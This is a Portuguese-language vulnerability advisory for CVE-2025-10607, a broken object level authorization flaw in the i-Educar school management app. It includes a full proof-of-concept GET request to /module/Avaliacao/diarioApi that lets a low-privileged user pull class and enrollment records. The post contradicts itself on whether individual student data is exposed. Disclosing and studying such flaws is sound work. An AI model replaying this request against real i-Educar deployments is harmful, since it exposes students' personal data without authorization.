Featured image of post CVE-2025-10607
Controle De Acesso Quebrado Moderado I-Educar Securança WebApp BOLA

CVE-2025-10607

Controle de Acesso Quebrado (BOLA)

CVE-2025-10607: Broken Object Level Authorization (BOLA) permite a enumeração de dados de classes via /module/Avaliacao/diarioApi

CVE Publication: https://www.cve.org/CVERecord?id=CVE-2025-10607

Resumo

Uma vulnerabilidade de Broken Object Level Authorization (BOLA) foi identificada no endpoint /module/Avaliacao/diarioApi do aplicativo i-Educar. Essa falha permite que um usuário sem as devidas permissões consulte o endpoint e recupere ** informações da turma** manipulando parâmetros de solicitação.

Embora essa vulnerabilidade não exponha diretamente dados individuais de alunos, ela ainda constitui uma divulgação não autorizada de informações de estrutura acadêmica, que pode ser aproveitada para enumeração ou como um trampolim para ataques futuros.

Detalhes

Endpoint vulnerável: GET /module/Avaliacao/diarioApi

O aplicativo não consegue aplicar a autorização em nível de objeto ao manipular este endpoint. Como resultado, qualquer usuário autenticado pode manipular os valores da solicitação para acessar informações confidenciais (nomes, IDs, status de matrícula) dos alunos.

Comportamento esperado:

  • Somente funções autorizadas (por exemplo, administradores, coordenadores, professores vinculados à turma) devem ter acesso a esses dados.
  • Usuários não autorizados devem receber a mensagem 403 "Proibido" ou uma resposta vazia.

Comportamento observado:

  • Qualquer usuário autenticado (mesmo contas com privilégios baixos) pode acessar este endpoint e recuperar informações confidenciais sobre turmas acadêmicas.

PoC

  • Autentique como um usuário sem privilégios (por exemplo, aluno, professor).

  • Envie a seguinte requisição:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

GET /module/Avaliacao/diarioApi?&resource=matriculas&oper=get&instituicao_id=1&escola_id=3&curso_id=4&serie_id=undefined&turma_id=3&ano_escolar=2025&componente_curricular_id=11&etapa=1&matricula_id=12&busca=S&mostrar_botao_replicar_todos=1&ano=2025&ref_cod_instituicao=1&ref_cod_escola=3&ref_cod_curso=4&ref_cod_serie=6&ref_cod_turma=3&etapa=1&ref_cod_componente_curricular=11&ref_cod_matricula=12&navegacao_tab=2 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br, zstd
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: http://localhost/module/Avaliacao/diario?&resource=matriculas&oper=get&instituicao_id=1&escola_id=3&curso_id=4&serie_id=undefined&turma_id=3&ano_escolar=2025&componente_curricular_id=11&etapa=1&matricula_id=12
Cookie: educar_session=[low-privileged-session]
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0

  • Pudemos observar que informações sobre classes foram retornadas.

Impacto

Esta vulnerabilidade é um problema de Broken Object Level Authorization (BOLA) (OWASP API Top 10 - 2023, A01), permitindo a exposição de dados sensíveis. Qualquer usuário autenticado pode acessar informações pessoais de outros usuários. Isso pode levar a:

  • Acesso não autorizado a PII sensíveis;
  • Violação das leis de proteção de dados (por exemplo, LGPD, GDPR);
  • Possível abuso de dados do usuário ou personificação;
  • Enumeração de usuários.

Referência

https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10607.md

Encontrado por

Marcelo Queiroz

Por: CVE-Hunters

© 2020 - 2025 CVE-Hunters
Built with Hugo
Theme Stack designed by Jimmy